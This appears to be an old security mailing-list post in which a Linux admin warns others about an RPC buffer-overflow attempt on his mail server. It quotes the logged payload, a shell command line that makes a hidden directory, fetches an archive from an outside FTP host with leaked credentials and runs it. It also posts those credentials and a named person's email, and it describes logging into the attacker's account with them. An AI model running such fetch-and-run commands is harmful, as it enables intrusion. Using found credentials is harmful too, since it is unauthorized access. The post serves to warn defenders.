Crack attempt last weekend

[Nick Ruisi <n_ruisi () SOFTHOME NET>]

Last weekend someone made an attempt at my Red Hat Linux mail server. I
am sharing this with you all so you can protect yourself against it.

While looking through my /var/log/messages file, I noticed a line from
in.rpcd (don't ask why I haven't disabled it - I hadn't realised it was
running). It appears someone was 1) Spoofing themselves as "localhost"
and 2) Attempting to overflow the rpc buffer. At the end of the
"overflow string" were the following commands

/bin/sh;mkdir /usr/man/man5/.sart;cd /usr/man/man5/.sart;ncftpget -u
agg0 -p sei 209.202.197.152 . c.tar.gz;tar xzvf c.tar.gz;./i

Yes, I have posted this individual's FTP username and password. They
left it in my logfile. Using that information, I was able to determine
that Lycos owns the netblock of the FTP server (its a tripod homepages
host). So I logged onto tripod with that username and password and was
able to determine that someone created the account for an identity named
Cara Freda (freda () emd2 org). The emd2.org domain appears to be all about
hacking and cracking/warez.

 Be careful out there!

- Nick Ruisi
  Linux Admin

P.S. I have already notified all service providers involved (Lycos,
NameZero, Tripod, Anglefire) and they have not responded to me.